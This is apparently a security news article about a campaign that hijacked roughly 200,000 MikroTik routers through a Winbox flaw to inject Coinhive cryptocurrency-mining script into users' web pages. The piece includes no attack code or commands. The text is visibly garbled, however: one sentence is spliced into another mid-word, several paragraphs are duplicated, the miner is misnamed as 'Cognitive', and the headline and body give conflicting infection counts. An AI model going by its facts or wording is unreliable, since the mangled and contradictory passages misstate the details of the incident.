200,000 MikroTik Routers Hacked and Turned Into Crypto-Mining Zombies

 MikroTik Routers hacked

MikroTik routers Independent malware investigator has discovered a massive crypto jacking campaign to targets MikroTik routers and re-arrange their setup setting to insert a copy of the Cognitive in-browser cryptocurrency miners on computers connected to them.more than 210,000 routers from Latvian network hardware provider Mikrotik across the world.

 

The first campaign, noticed by Trustwave researchers, began with targeting networking devices in Brazil, where a hacker oTroy Mursch, another security researcher, has identified two similar malware campaigns that infected 25,500 and 16,000 MikroTik routers, mainly in Moldova, with malicious cryptocurrency mining code from infamous cognitive service.r a group of hackers compromised more than 183,700 MikroTik routers.MikroTik Routers hacked-globalhacknews

The first campaign, noticed by Trustwave researchers, began with targeting networking devices in Brazil, where a hacker or a group of hackers compromised more than 183,700 MikroTik routers.

Global Hacker-Troy Mursch has classified two similar malware attacks that affected 25,500 and 16,000 MikroTik Routers hacked, with malicious cryptocurrency mining code from infamous coinhive service.

Hacker adding Coinhive’s Javascript within all web page that a user using regularly a vulnerable router, ultimately charging every compared computer to unknowingly mine Monero cryptocurrency for the miscreants.

Hacker created a custom error page with the CoinHive script in it” and “if a routers user receives an error page of any kind while web browsing, they will get this custom error page which will mine CoinHive for the attacker,” says Trustwave researcher Simon Kenin.
the attacker uses a zero-day in the Winbox component of routers. MikroTik patched the zero-day in less than a day, back in April, but this didn’t necessarily mean that router owners applied the required patch.,” Kenin said.

It’s a good reminder for users and IT managers who are still running vulnerable MikroTik routers in their environment to patch their devices as soon as possible

The security flaw can probably enable an attacker to gain unauthenticated, remote administrative entrance to any vulnerable MikroTik router.